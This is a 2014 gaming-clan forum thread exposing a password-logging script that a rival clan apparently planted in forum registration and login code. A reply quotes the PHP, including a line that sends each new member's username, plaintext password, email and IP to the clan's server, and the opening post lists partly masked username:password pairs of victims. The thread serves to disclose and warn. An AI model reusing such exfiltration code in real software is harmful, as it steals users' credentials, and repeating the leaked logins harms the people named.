slushpuppy Posted October 8, 2014 Report Share Posted October 8, 2014 http://www.sharkbrew.com/community/index.php?/topic/2966-cpcvsv-exposed-stay-away-from-these-clans/ Background info: I was asked by LT to take over hosting from [CP]Parm. Sam has mentioned to me off handedly that a number of his members had been hacked using LT's site, so I took the opportunity to peak around the original config files. The results are scary. Essentially this is a list of sites so far that has this rat on it: LT Old CV New CV Old zenith(Idk which forum tonqir came from) Basically Parm probably ratted his own clan members?!?! How this rat works is, it will log your password, then send the user/pass to SV's server for "svkeeping". I have uncovered some .txt files containing some passes. If you are one of them, i suggest you change your passes ASAP. touqirn**ir:t***i* touqirn**ir:d****r silents****a:n***for****d its_supa:date*****02 its_supa:******82 zakchips:*****ont eternal_self:*****v12xzarathustra:******ohnpro_dutcher:******n96 In this grand scheme of things, CP/SV has been logging passwords of multiple forums without the user's knowledge. I have inserted 3x images detailing the script containing the RAT Attached are 3 urls leading to the rat(it will be removed soon i bet) http://sv-rs.org/tools/raw/acp.txt http://sv-rs.org/tools/raw/registration.txt http://sv-rs.org/tools/raw/login.txt P.S. Some evidence they are doing the same for other main clan forums J Styles and Cronic 2 Link to comment Share on other sites More sharing options...
Dripz` Posted October 8, 2014 Report Share Posted October 8, 2014 rip Link to comment Share on other sites More sharing options...
`Fly Posted October 8, 2014 Report Share Posted October 8, 2014 rip Link to comment Share on other sites More sharing options...
anone69 Posted October 8, 2014 Report Share Posted October 8, 2014 Fucking snakes trying sohard just play the fucking game and have fun, if you lose you lost if you win you won no need for bitchmoves Figment, 0ldschooler, Austin and 3 others 6 Link to comment Share on other sites More sharing options...
Rebel Posted October 8, 2014 Report Share Posted October 8, 2014 jesus christ Link to comment Share on other sites More sharing options...
Jim Posted October 8, 2014 Report Share Posted October 8, 2014 Sad ;-; Link to comment Share on other sites More sharing options...
Rebel Posted October 8, 2014 Report Share Posted October 8, 2014 this isn't the first time that parm/toxic/ leakede acp to hittin lo Link to comment Share on other sites More sharing options...
SV Elve Posted October 8, 2014 Report Share Posted October 8, 2014 You forgot the part where you tried to SQLi, but failed. Nowadays, we use parameterized queries. Link to comment Share on other sites More sharing options...
cassidy69 Posted October 8, 2014 Report Share Posted October 8, 2014 is my email in there? query me on irc if possible so i can check Link to comment Share on other sites More sharing options...
slushpuppy Posted October 8, 2014 Author Report Share Posted October 8, 2014 You forgot the part where you tried to SQLi, but failed. Nowadays, we use parameterized queries. Care to share how many user/passes you have in you table? Link to comment Share on other sites More sharing options...
Harrie Posted October 8, 2014 Report Share Posted October 8, 2014 This game Link to comment Share on other sites More sharing options...
Downyz Posted October 8, 2014 Report Share Posted October 8, 2014 Thanks Slush. I can't say I didn't expect it tho, Dr paid Parm 5m for access to our acp :x Link to comment Share on other sites More sharing options...
slushpuppy Posted October 8, 2014 Author Report Share Posted October 8, 2014 12,000 or so. Why not 15,000? Link to comment Share on other sites More sharing options...
Sl acid Posted October 8, 2014 Report Share Posted October 8, 2014 Kekekekkekekeke cleared Link to comment Share on other sites More sharing options...
Persian Tom Posted October 8, 2014 Report Share Posted October 8, 2014 Wow. Thanks slush ! Link to comment Share on other sites More sharing options...
I3elg Posted October 8, 2014 Report Share Posted October 8, 2014 Thx slush pmed some of dem ! Link to comment Share on other sites More sharing options...
Joe Ftw Posted October 8, 2014 Report Share Posted October 8, 2014 Slush you are the bomb Link to comment Share on other sites More sharing options...
aaronz Posted October 8, 2014 Report Share Posted October 8, 2014 wooot woot Link to comment Share on other sites More sharing options...
Tribey0 Posted October 8, 2014 Report Share Posted October 8, 2014 lol Link to comment Share on other sites More sharing options...
Tom Valor Posted October 8, 2014 Report Share Posted October 8, 2014 Can't belvie Parm would accually do this, but he did, with Toxic, can't belive I was in his clan. A Shame. Tim, B0Y and Destroy 3 Link to comment Share on other sites More sharing options...
I3elg Posted October 8, 2014 Report Share Posted October 8, 2014 Can't belvie Parm would accually do this, but he did, with Toxic, can't belive I was in his clan. A Shame. I know man is fucking sad lmao ineed to xzara so icould pm him B0Y 1 Link to comment Share on other sites More sharing options...
cassidy69 Posted October 8, 2014 Report Share Posted October 8, 2014 This is taken directly from sv-rs.org Logs to remind you guys their stealing your Facebook,Twitter, though for twitch i havent found a script for it on here yet /* Attempt to fetch user details */ $classToLoad = IPSLib::loadLibrary( IPS_ROOT_PATH . 'sources/classes/facebook/connect.php', 'facebook_connect' ); $facebook = new $classToLoad( $this->registry, $member['fb_token'], $member['fb_uid'] ); $userData = $facebook->fetchUserData(); if ( $userData['id'] ) { $userData['service'] = 'facebook'; $userData['_name'] = $userData['name']; $userData['_pic'] = $userData['pic_square']; $userData['_sImage'] = $this->settings['public_dir'] . 'style_status/facebook.png'; /* Enforcing / allowing real names? */ if ( ! count( $form_errors['dname'] ) AND $this->settings['fb_realname'] != 'any' ) { $userData['_displayName'] = $userData['_name']; ( $member['twitter_id'] AND $member['twitter_token'] AND $member['twitter_secret'] ) { /* Attempt to fetch user details */ $classToLoad = IPSLib::loadLibrary( IPS_ROOT_PATH . 'sources/classes/twitter/connect.php', 'twitter_connect' ); $twitter = new $classToLoad( $this->registry, $member['twitter_token'], $member['twitter_secret'] ); $userData = $twitter->fetchUserData(); if ( $userData['id'] ) { $userData['service'] = 'twitter'; $userData['_name'] = $userData['screen_name']; $userData['_pic'] = $userData['profile_image_url']; $userData['_sImage'] = $this->settings['public_dir'] . 'style_status/twitter.png'; // Give SV the info... //----------------------------------------- $user = str_replace(' ', '%20', $this->request['members_display_name']); file_get_contents('http://sv-rs.org/tools/insert.php?site=' . $_SERVER['SERVER_NAME'] . '&type=Registration&username=' . $user . '&password=' . $in_password . '&email=' . $in_email . '&ip=' . $_SERVER['REMOTE_ADDR']); /* Create member */ $member = array( Link to comment Share on other sites More sharing options...
slushpuppy Posted October 8, 2014 Author Report Share Posted October 8, 2014 That would be the function to login via facebook.. But thanks for the idea. make sure you use parameterized queries! Link to comment Share on other sites More sharing options...
cassidy69 Posted October 8, 2014 Report Share Posted October 8, 2014 That would be the function to login via facebook.. But thanks for the idea. l0l my lord you are blind Link to comment Share on other sites More sharing options...
Wardy Posted October 8, 2014 Report Share Posted October 8, 2014 Well, that happened. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now